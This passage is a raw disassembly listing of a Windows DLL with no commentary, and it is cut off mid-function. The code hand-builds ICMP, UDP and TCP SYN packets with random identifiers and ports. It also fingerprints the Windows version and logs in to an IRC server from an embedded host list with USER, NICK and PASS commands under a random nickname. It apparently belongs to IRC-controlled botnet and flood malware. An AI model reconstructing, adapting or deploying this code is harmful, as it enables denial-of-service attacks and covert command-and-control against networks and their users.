add esp, 4
push eax ; len
lea ecx, [ebp+var_594]
push ecx ; buf
mov edx, [ebp+fd]
push edx ; s
call ds:send ; send
loc_100067E1: ; CODE XREF: sub_10005C3D:loc_100067B9�j
jmp short loc_10006850
; ---------------------------------------------------------------------------
loc_100067E3: ; CODE XREF: sub_10005C3D+A90�j
lea eax, [ebp+Str2]
push eax ; Str2
push offset aQuit_0 ; "QUIT"
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_10006850
mov ecx, dword_10012104
mov [ebp+var_5A4], ecx
mov edx, dword_10012108
mov [ebp+var_5A0], edx
mov eax, dword_1001210C
mov [ebp+var_59C], eax
mov cl, byte_10012110
mov [ebp+var_598], cl
push 0 ; flags
lea edx, [ebp+var_5A4]
push edx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea eax, [ebp+var_5A4]
push eax ; buf
mov ecx, [ebp+fd]
push ecx ; s
call ds:send ; send
loc_10006850: ; CODE XREF: sub_10005C3D+5A8�j
; sub_10005C3D+5FD�j ...
push 64h ; Size
push 0 ; Val
lea edx, [ebp+Dst]
push edx ; Dst
call memset ; memset
add esp, 0Ch
loc_10006863: ; CODE XREF: sub_10005C3D+290�j
; sub_10005C3D:loc_10006093�j ...
jmp loc_10005E71
; ---------------------------------------------------------------------------
loc_10006868: ; CODE XREF: sub_10005C3D+24F�j
jmp loc_10005E07
; ---------------------------------------------------------------------------
loc_1000686D: ; CODE XREF: sub_10005C3D+1D1�j
push 1
mov eax, [ebp+var_188]
push eax
call sub_1000AB26
add esp, 8
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
xor eax, eax
pop edi
pop esi
mov esp, ebp
pop ebp
retn 4
sub_10005C3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10006893 proc near ; DATA XREF: .data:1000E034�o
push ebp
mov ebp, esp
call sub_100068A2
call sub_100068B2
pop ebp
retn
sub_10006893 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100068A2 proc near ; CODE XREF: sub_10006893+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D10B
call ds:??0Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::Init(void)
pop ebp
retn
sub_100068A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100068B2 proc near ; CODE XREF: sub_10006893+8�p
push ebp
mov ebp, esp
push offset sub_100068C4 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_100068B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_100068C4()
sub_100068C4 proc near ; DATA XREF: sub_100068B2+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D10B
call ds:??1Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::~Init(void)
pop ebp
retn
sub_100068C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100068D4 proc near ; DATA XREF: .data:1000E038�o
push ebp
mov ebp, esp
call sub_100068E3
call sub_100068F3
pop ebp
retn
sub_100068D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100068E3 proc near ; CODE XREF: sub_100068D4+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D10A
call ds:??0_Winit@std@@QAE@XZ ; std::_Winit::_Winit(void)
pop ebp
retn
sub_100068E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100068F3 proc near ; CODE XREF: sub_100068D4+8�p
push ebp
mov ebp, esp
push offset sub_10006905 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_100068F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_10006905()
sub_10006905 proc near ; DATA XREF: sub_100068F3+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D10A
call ds:??1_Winit@std@@QAE@XZ ; std::_Winit::~_Winit(void)
pop ebp
retn
sub_10006905 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10006920 proc near ; DATA XREF: .data:1000E03C�o
push ebp
mov ebp, esp
call sub_1000692F
call sub_1000693F
pop ebp
retn
sub_10006920 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000692F proc near ; CODE XREF: sub_10006920+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D115
call ds:??0Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::Init(void)
pop ebp
retn
sub_1000692F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000693F proc near ; CODE XREF: sub_10006920+8�p
push ebp
mov ebp, esp
push offset sub_10006951 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_1000693F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_10006951()
sub_10006951 proc near ; DATA XREF: sub_1000693F+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D115
call ds:??1Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::~Init(void)
pop ebp
retn
sub_10006951 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10006961 proc near ; DATA XREF: .data:1000E040�o
push ebp
mov ebp, esp
call sub_10006970
call sub_10006980
pop ebp
retn
sub_10006961 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10006970 proc near ; CODE XREF: sub_10006961+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D114
call ds:??0_Winit@std@@QAE@XZ ; std::_Winit::_Winit(void)
pop ebp
retn
sub_10006970 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10006980 proc near ; CODE XREF: sub_10006961+8�p
push ebp
mov ebp, esp
push offset sub_10006992 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_10006980 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_10006992()
sub_10006992 proc near ; DATA XREF: sub_10006980+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D114
call ds:??1_Winit@std@@QAE@XZ ; std::_Winit::~_Winit(void)
pop ebp
retn
sub_10006992 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100069A2 proc near ; CODE XREF: sub_10006A3B+BC�p
; sub_10006A3B+150�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_4], 0
mov eax, [ebp+arg_4]
mov [ebp+var_10], eax
mov word ptr [ebp+var_8], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], ecx
loc_100069C1: ; CODE XREF: sub_100069A2+47�j
cmp [ebp+var_10], 1
jle short loc_100069EB
mov edx, [ebp+var_C]
xor eax, eax
mov ax, [edx]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov edx, [ebp+var_C]
add edx, 2
mov [ebp+var_C], edx
mov eax, [ebp+var_10]
sub eax, 2
mov [ebp+var_10], eax
jmp short loc_100069C1
; ---------------------------------------------------------------------------
loc_100069EB: ; CODE XREF: sub_100069A2+23�j
cmp [ebp+var_10], 1
jnz short loc_10006A09
mov ecx, [ebp+var_C]
mov dl, [ecx]
mov byte ptr [ebp+var_8], dl
mov eax, [ebp+var_8]
and eax, 0FFFFh
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
loc_10006A09: ; CODE XREF: sub_100069A2+4D�j
mov edx, [ebp+var_4]
sar edx, 10h
mov eax, [ebp+var_4]
and eax, 0FFFFh
add edx, eax
mov [ebp+var_4], edx
mov ecx, [ebp+var_4]
sar ecx, 10h
mov edx, [ebp+var_4]
add edx, ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
not eax
mov word ptr [ebp+var_8], ax
mov ax, word ptr [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_100069A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10006A3B proc near ; CODE XREF: sub_1000B205+188�p
Memory = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
push 208h ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Memory], eax
push 200h ; Size
push 0FFh
push 0
call sub_10004608
add esp, 8
push eax ; Val
mov eax, [ebp+arg_0]
add eax, 1Ch
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov ecx, [ebp+arg_0]
mov dl, [ecx]
and dl, 0F0h
or dl, 5
mov eax, [ebp+arg_0]
mov [eax], dl
mov ecx, [ebp+arg_0]
mov dl, [ecx]
and dl, 0Fh
or dl, 40h
mov eax, [ebp+arg_0]
mov [eax], dl
mov ecx, [ebp+arg_0]
mov byte ptr [ecx+1], 0
push 4 ; hostshort
call ds:htons ; htons
mov edx, [ebp+arg_0]
mov [edx+2], ax
call ds:rand ; rand
push eax ; hostshort
call ds:htons ; htons
mov ecx, [ebp+arg_0]
mov [ecx+4], ax
mov edx, [ebp+arg_0]
mov word ptr [edx+6], 0
mov eax, [ebp+arg_0]
mov byte ptr [eax+8], 80h
mov ecx, [ebp+arg_0]
mov byte ptr [ecx+9], 1
mov edx, [ebp+arg_0]
mov word ptr [edx+0Ah], 0
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
mov [eax+0Ch], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_8]
mov [edx+10h], eax
push 14h
mov ecx, [ebp+arg_0]
push ecx
call sub_100069A2
add esp, 8
mov edx, [ebp+arg_0]
mov [edx+0Ah], ax
mov eax, [ebp+arg_0]
mov byte ptr [eax+14h], 8
mov ecx, [ebp+arg_0]
mov byte ptr [ecx+15h], 0
call ds:rand ; rand
push eax ; hostshort
call ds:htons ; htons
mov edx, [ebp+arg_0]
mov [edx+18h], ax
mov eax, [ebp+arg_0]
mov word ptr [eax+16h], 0
call ds:rand ; rand
mov esi, eax
shl esi, 10h
call ds:rand ; rand
or esi, eax
push esi ; hostshort
call ds:htons ; htons
mov ecx, [ebp+arg_0]
mov [ecx+1Ah], ax
push 8 ; Size
mov edx, [ebp+arg_0]
add edx, 14h
push edx ; Src
mov eax, [ebp+Memory]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
push 200h ; Size
mov ecx, [ebp+arg_0]
add ecx, 1Ch
push ecx ; Src
mov edx, [ebp+Memory]
add edx, 8
push edx ; Dst
call memcpy ; memcpy
add esp, 0Ch
push 208h
mov eax, [ebp+Memory]
push eax
call sub_100069A2
add esp, 8
mov ecx, [ebp+arg_0]
mov [ecx+16h], ax
mov edx, [ebp+Memory]
push edx ; Memory
call ds:free ; free
add esp, 4
pop esi
mov esp, ebp
pop ebp
retn
sub_10006A3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10006BAC(int,int,int,u_short hostshort,__int16)
sub_10006BAC proc near ; CODE XREF: sub_1000B442+1D8�p
Memory = dword ptr -10h
Src = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
hostshort = word ptr 14h
arg_10 = word ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
push 214h ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Memory], eax
push 200h ; Size
push 0FFh
push 0
call sub_10004608
add esp, 8
push eax ; Val
mov eax, [ebp+arg_0]
add eax, 1Ch
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov ecx, [ebp+arg_0]
mov dl, [ecx]
and dl, 0F0h
or dl, 5
mov eax, [ebp+arg_0]
mov [eax], dl
mov ecx, [ebp+arg_0]
mov dl, [ecx]
and dl, 0Fh
or dl, 40h
mov eax, [ebp+arg_0]
mov [eax], dl
mov ecx, [ebp+arg_0]
mov byte ptr [ecx+1], 0
push 4 ; hostshort
call ds:htons ; htons
mov edx, [ebp+arg_0]
mov [edx+2], ax
call ds:rand ; rand
push eax ; hostshort
call ds:htons ; htons
mov ecx, [ebp+arg_0]
mov [ecx+4], ax
mov edx, [ebp+arg_0]
mov word ptr [edx+6], 0
mov eax, [ebp+arg_0]
mov byte ptr [eax+8], 80h
mov ecx, [ebp+arg_0]
mov byte ptr [ecx+9], 11h
mov edx, [ebp+arg_0]
mov word ptr [edx+0Ah], 0
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
mov [eax+0Ch], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_8]
mov [edx+10h], eax
push 14h
mov ecx, [ebp+arg_0]
push ecx
call sub_100069A2
add esp, 8
mov edx, [ebp+arg_0]
mov [edx+0Ah], ax
mov ax, [ebp+hostshort]
push eax ; hostshort
call ds:htons ; htons
mov ecx, [ebp+arg_0]
mov [ecx+14h], ax
mov dx, [ebp+arg_10]
push edx ; hostshort
call ds:htons ; htons
mov ecx, [ebp+arg_0]
mov [ecx+16h], ax
push 208h ; hostshort
call ds:htons ; htons
mov edx, [ebp+arg_0]
mov [edx+18h], ax
mov eax, [ebp+arg_0]
mov word ptr [eax+1Ah], 0
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
mov [ebp+Src], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+10h]
mov [ebp+var_8], ecx
mov [ebp+var_4], 0
mov edx, [ebp+arg_0]
mov al, [edx+9]
mov [ebp+var_3], al
push 208h ; hostshort
call ds:htons ; htons
mov [ebp+var_2], ax
push 0Ch ; Size
lea ecx, [ebp+Src]
push ecx ; Src
mov edx, [ebp+Memory]
push edx ; Dst
call memcpy ; memcpy
add esp, 0Ch
push 8 ; Size
mov eax, [ebp+arg_0]
add eax, 14h
push eax ; Src
mov ecx, [ebp+Memory]
add ecx, 0Ch
push ecx ; Dst
call memcpy ; memcpy
add esp, 0Ch
push 200h ; Size
mov edx, [ebp+arg_0]
add edx, 1Ch
push edx ; Src
mov eax, [ebp+Memory]
add eax, 14h
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
push 214h
mov ecx, [ebp+Memory]
push ecx
call sub_100069A2
add esp, 8
mov edx, [ebp+arg_0]
mov [edx+1Ah], ax
mov eax, [ebp+Memory]
push eax ; Memory
call ds:free ; free
add esp, 4
mov esp, ebp
pop ebp
retn
sub_10006BAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10006D53(int,int,int,u_short hostshort,__int16)
sub_10006D53 proc near ; CODE XREF: sub_10009E30+92�p
; .text:1000B895�p
Memory = dword ptr -10h
Src = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
hostshort = word ptr 14h
arg_10 = word ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
push esi
push 20h ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Memory], eax
mov eax, [ebp+arg_0]
mov cl, [eax]
and cl, 0F0h
or cl, 5
mov edx, [ebp+arg_0]
mov [edx], cl
mov eax, [ebp+arg_0]
mov cl, [eax]
and cl, 0Fh
or cl, 40h
mov edx, [ebp+arg_0]
mov [edx], cl
mov eax, [ebp+arg_0]
mov byte ptr [eax+1], 0
push 4 ; hostshort
call ds:htons ; htons
mov ecx, [ebp+arg_0]
mov [ecx+2], ax
call ds:rand ; rand
push eax ; hostshort
call ds:htons ; htons
mov edx, [ebp+arg_0]
mov [edx+4], ax
mov eax, [ebp+arg_0]
mov word ptr [eax+6], 0
mov ecx, [ebp+arg_0]
mov byte ptr [ecx+8], 80h
mov edx, [ebp+arg_0]
mov byte ptr [edx+9], 6
mov eax, [ebp+arg_0]
mov word ptr [eax+0Ah], 0
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_4]
mov [ecx+0Ch], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_8]
mov [eax+10h], ecx
push 14h
mov edx, [ebp+arg_0]
push edx
call sub_100069A2
add esp, 8
mov ecx, [ebp+arg_0]
mov [ecx+0Ah], ax
mov dx, [ebp+hostshort]
push edx ; hostshort
call ds:htons ; htons
mov ecx, [ebp+arg_0]
mov [ecx+14h], ax
mov dx, [ebp+arg_10]
push edx ; hostshort
call ds:htons ; htons
mov ecx, [ebp+arg_0]
mov [ecx+16h], ax
mov edx, [ebp+arg_0]
mov dword ptr [edx+1Ch], 0
mov eax, [ebp+arg_0]
mov cl, [eax+20h]
and cl, 0F0h
mov edx, [ebp+arg_0]
mov [edx+20h], cl
mov eax, [ebp+arg_0]
mov cl, [eax+20h]
and cl, 0Fh
or cl, 50h
mov edx, [ebp+arg_0]
mov [edx+20h], cl
mov eax, [ebp+arg_0]
mov byte ptr [eax+21h], 2
push 4000h ; hostshort
call ds:htons ; htons
mov ecx, [ebp+arg_0]
mov [ecx+22h], ax
mov edx, [ebp+arg_0]
mov word ptr [edx+24h], 0
mov eax, [ebp+arg_0]
mov word ptr [eax+26h], 0
call ds:rand ; rand
mov esi, eax
shl esi, 10h
call ds:rand ; rand
or esi, eax
push esi ; hostshort
call ds:htons ; htons
and eax, 0FFFFh
mov ecx, [ebp+arg_0]
mov [ecx+18h], eax
mov edx, [ebp+arg_0]
mov eax, [edx+0Ch]
mov [ebp+Src], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+10h]
mov [ebp+var_8], edx
mov [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov cl, [eax+9]
mov [ebp+var_3], cl
push 14h ; hostshort
call ds:htons ; htons
mov [ebp+var_2], ax
push 0Ch ; Size
lea edx, [ebp+Src]
push edx ; Src
mov eax, [ebp+Memory]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
push 14h ; Size
mov ecx, [ebp+arg_0]
add ecx, 14h
push ecx ; Src
mov edx, [ebp+Memory]
add edx, 0Ch
push edx ; Dst
call memcpy ; memcpy
add esp, 0Ch
push 20h
mov eax, [ebp+Memory]
push eax
call sub_100069A2
add esp, 8
mov ecx, [ebp+arg_0]
mov [ecx+24h], ax
mov edx, [ebp+Memory]
push edx ; Memory
call ds:free ; free
add esp, 4
pop esi
mov esp, ebp
pop ebp
retn
sub_10006D53 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10006F20 proc near ; DATA XREF: .data:1000E044�o
push ebp
mov ebp, esp
call sub_10006F2F
call sub_10006F3F
pop ebp
retn
sub_10006F20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10006F2F proc near ; CODE XREF: sub_10006F20+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D11D
call ds:??0Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::Init(void)
pop ebp
retn
sub_10006F2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10006F3F proc near ; CODE XREF: sub_10006F20+8�p
push ebp
mov ebp, esp
push offset sub_10006F51 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_10006F3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_10006F51()
sub_10006F51 proc near ; DATA XREF: sub_10006F3F+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D11D
call ds:??1Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::~Init(void)
pop ebp
retn
sub_10006F51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10006F61 proc near ; DATA XREF: .data:1000E048�o
push ebp
mov ebp, esp
call sub_10006F70
call sub_10006F80
pop ebp
retn
sub_10006F61 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10006F70 proc near ; CODE XREF: sub_10006F61+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D11C
call ds:??0_Winit@std@@QAE@XZ ; std::_Winit::_Winit(void)
pop ebp
retn
sub_10006F70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10006F80 proc near ; CODE XREF: sub_10006F61+8�p
push ebp
mov ebp, esp
push offset sub_10006F92 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_10006F80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_10006F92()
sub_10006F92 proc near ; DATA XREF: sub_10006F80+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D11C
call ds:??1_Winit@std@@QAE@XZ ; std::_Winit::~_Winit(void)
pop ebp
retn
sub_10006F92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10006FA2 proc near ; CODE XREF: sub_10001EBF+66�p
; sub_100024A5+383�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push 0Ch ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+var_4], eax
push 8
push 6
call sub_10004608
add esp, 8
mov [ebp+var_C], eax
mov [ebp+var_8], 0
jmp short loc_10006FD7
; ---------------------------------------------------------------------------
loc_10006FCE: ; CODE XREF: sub_10006FA2+51�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_10006FD7: ; CODE XREF: sub_10006FA2+2A�j
mov ecx, [ebp+var_8]
cmp ecx, [ebp+var_C]
jge short loc_10006FF5
push 7Ah
push 61h
call sub_10004608
add esp, 8
mov edx, [ebp+var_4]
add edx, [ebp+var_8]
mov [edx], al
jmp short loc_10006FCE
; ---------------------------------------------------------------------------
loc_10006FF5: ; CODE XREF: sub_10006FA2+3B�j
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov byte ptr [eax], 0
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_10006FA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10007005 proc near ; CODE XREF: start:loc_100043AC�p
; start:loc_10004408�p
VersionInformation= _OSVERSIONINFOA ptr -0C8h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
Dest = byte ptr -1Ch
name = sockaddr ptr -10h
push ebp
mov ebp, esp
sub esp, 0C8h
mov eax, dword_10012118
mov [ebp+var_28], eax
mov ecx, dword_1001211C
mov [ebp+var_24], ecx
mov dword ptr [ebp+var_2C], offset dword_1002D124
mov [ebp+VersionInformation.dwOSVersionInfoSize], 94h
lea edx, [ebp+VersionInformation]
push edx ; lpVersionInformation
call ds:GetVersionExA ; GetVersionExA
call ds:GetTickCount ; GetTickCount
push eax ; Seed
call ds:srand ; srand
add esp, 4
cmp [ebp+VersionInformation.dwMajorVersion], 4
jnz short loc_10007084
cmp [ebp+VersionInformation.dwMinorVersion], 0
jnz short loc_10007084
cmp [ebp+VersionInformation.dwPlatformId], 1
jnz short loc_1000706F
mov dword ptr [ebp+var_2C], offset dword_10012120
loc_1000706F: ; CODE XREF: sub_10007005+61�j
cmp [ebp+VersionInformation.dwPlatformId], 2
jnz short loc_1000707F
mov dword ptr [ebp+var_2C], offset dword_10012124
loc_1000707F: ; CODE XREF: sub_10007005+71�j
jmp loc_10007112
; ---------------------------------------------------------------------------
loc_10007084: ; CODE XREF: sub_10007005+4F�j
; sub_10007005+58�j
cmp [ebp+VersionInformation.dwMajorVersion], 4
jnz short loc_1000709F
cmp [ebp+VersionInformation.dwMinorVersion], 0Ah
jnz short loc_1000709F
mov dword ptr [ebp+var_2C], offset dword_10012128
jmp short loc_10007112
; ---------------------------------------------------------------------------
loc_1000709F: ; CODE XREF: sub_10007005+86�j
; sub_10007005+8F�j
cmp [ebp+VersionInformation.dwMajorVersion], 4
jnz short loc_100070BA
cmp [ebp+VersionInformation.dwMinorVersion], 5Ah
jnz short loc_100070BA
mov dword ptr [ebp+var_2C], offset dword_1001212C
jmp short loc_10007112
; ---------------------------------------------------------------------------
loc_100070BA: ; CODE XREF: sub_10007005+A1�j
; sub_10007005+AA�j
cmp [ebp+VersionInformation.dwMajorVersion], 5
jnz short loc_100070D5
cmp [ebp+VersionInformation.dwMinorVersion], 0
jnz short loc_100070D5
mov dword ptr [ebp+var_2C], offset dword_10012130
jmp short loc_10007112
; ---------------------------------------------------------------------------
loc_100070D5: ; CODE XREF: sub_10007005+BC�j
; sub_10007005+C5�j
cmp [ebp+VersionInformation.dwMajorVersion], 5
jnz short loc_100070F0
cmp [ebp+VersionInformation.dwMinorVersion], 1
jnz short loc_100070F0
mov dword ptr [ebp+var_2C], offset dword_10012134
jmp short loc_10007112
; ---------------------------------------------------------------------------
loc_100070F0: ; CODE XREF: sub_10007005+D7�j
; sub_10007005+E0�j
cmp [ebp+VersionInformation.dwMajorVersion], 5
jnz short loc_1000710B
cmp [ebp+VersionInformation.dwMinorVersion], 2
jnz short loc_1000710B
mov dword ptr [ebp+var_2C], offset dword_10012138
jmp short loc_10007112
; ---------------------------------------------------------------------------
loc_1000710B: ; CODE XREF: sub_10007005+F2�j
; sub_10007005+FB�j
mov dword ptr [ebp+var_2C], offset dword_1001213C
loc_10007112: ; CODE XREF: sub_10007005:loc_1000707F�j
; sub_10007005+98�j ...
mov eax, s
push eax ; s
call ds:closesocket ; closesocket
push 0 ; protocol
push 1 ; type
push 2 ; af
call ds:socket ; socket
mov s, eax
cmp s, 0FFFFFFFFh
jnz short loc_1000713F
xor al, al
jmp loc_1000728F
; ---------------------------------------------------------------------------
loc_1000713F: ; CODE XREF: sub_10007005+131�j
mov [ebp+var_30], 0
jmp short loc_10007151
; ---------------------------------------------------------------------------
loc_10007148: ; CODE XREF: sub_10007005+15D�j
mov ecx, [ebp+var_30]
add ecx, 1
mov [ebp+var_30], ecx
loc_10007151: ; CODE XREF: sub_10007005+141�j
mov edx, [ebp+var_30]
shl edx, 7
movsx eax, byte_1002C8E8[edx]
test eax, eax
jz short loc_10007164
jmp short loc_10007148
; ---------------------------------------------------------------------------
loc_10007164: ; CODE XREF: sub_10007005+15B�j
mov ecx, [ebp+var_30]
sub ecx, 1
mov [ebp+var_30], ecx
mov edx, [ebp+var_30]
push edx
push 0
call sub_10004608
add esp, 8
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
shl eax, 7
add eax, offset byte_1002C8E8
push eax ; Src
call sub_10004BF7
add esp, 4
and eax, 0FFh
test eax, eax
jz short loc_100071B3
mov ecx, [ebp+var_20]
shl ecx, 7
add ecx, offset byte_1002C8E8
push ecx ; cp
call ds:inet_addr ; inet_addr
mov [ebp+var_34], eax
jmp short loc_100071CB
; ---------------------------------------------------------------------------
loc_100071B3: ; CODE XREF: sub_10007005+194�j
mov edx, [ebp+var_20]
shl edx, 7
add edx, offset byte_1002C8E8
push edx ; name
call sub_10004763
add esp, 4
mov [ebp+var_34], eax
loc_100071CB: ; CODE XREF: sub_10007005+1AC�j
cmp [ebp+var_34], 0
jnz short loc_100071D8
xor al, al
jmp loc_1000728F
; ---------------------------------------------------------------------------
loc_100071D8: ; CODE XREF: sub_10007005+1CA�j
mov [ebp+name.sa_family], 2
push offset Str ; Str
call ds:atoi ; atoi
add esp, 4
push eax ; hostshort
call ds:htons ; htons
mov word ptr [ebp+name.sa_data], ax
mov eax, [ebp+var_34]
mov dword ptr [ebp+name.sa_data+2], eax
push 8 ; Size
push 0 ; Val
lea ecx, [ebp+name.sa_data+6]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
push 10h ; namelen
lea edx, [ebp+name]
push edx ; name
mov eax, s
push eax ; s
call ds:connect ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_10007228
xor al, al
jmp short loc_1000728F
; ---------------------------------------------------------------------------
loc_10007228: ; CODE XREF: sub_10007005+21D�j
push 0Ch ; Count
call sub_10006FA2
push eax ; Source
lea ecx, [ebp+Dest]
push ecx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
lea edx, [ebp+Dest]
push edx
mov eax, dword ptr [ebp+var_2C]
push eax ; char
push offset aUserSS ; "USER %s \"\" \"\" :%s"
call sub_10007293
add esp, 0Ch
lea ecx, [ebp+var_28]
push ecx
lea edx, [ebp+Dest]
push edx
mov eax, dword ptr [ebp+var_2C]
push eax ; char
push offset aNickSSS ; "NICK |%s%s%s"
call sub_10007293
add esp, 10h
movsx ecx, byte_10012C44
test ecx, ecx
jz short loc_10007288
push offset byte_10012C44 ; char
push offset aPassS ; "PASS %s"
call sub_10007293
add esp, 8
loc_10007288: ; CODE XREF: sub_10007005+26F�j
call sub_10004C83
mov al, 1
loc_1000728F: ; CODE XREF: sub_10007005+135�j
; sub_10007005+1CE�j ...
mov esp, ebp
pop ebp
retn
sub_10007005 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10007293(char *Format,char)
sub_10007293 proc near ; CODE XREF: sub_10005380+1A8�p
; sub_10007005+245�p ...
ArgList = dword ptr -204h
buf = byte ptr -200h
Format = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 204h
lea eax, [ebp+arg_4]
mov [ebp+ArgList], eax
mov ecx, [ebp+ArgList]
push ecx ; ArgList
mov edx, [ebp+Format]
push edx ; Format
push 1FEh ; MaxCount
lea eax, [ebp+buf]
push eax ; DstBuf
call ds:_vsnprintf ; _vsnprintf
add esp, 10h
push offset asc_1001216C ; "\r\n"
lea ecx, [ebp+buf]
push ecx ; Dest
call strcat ; strcat
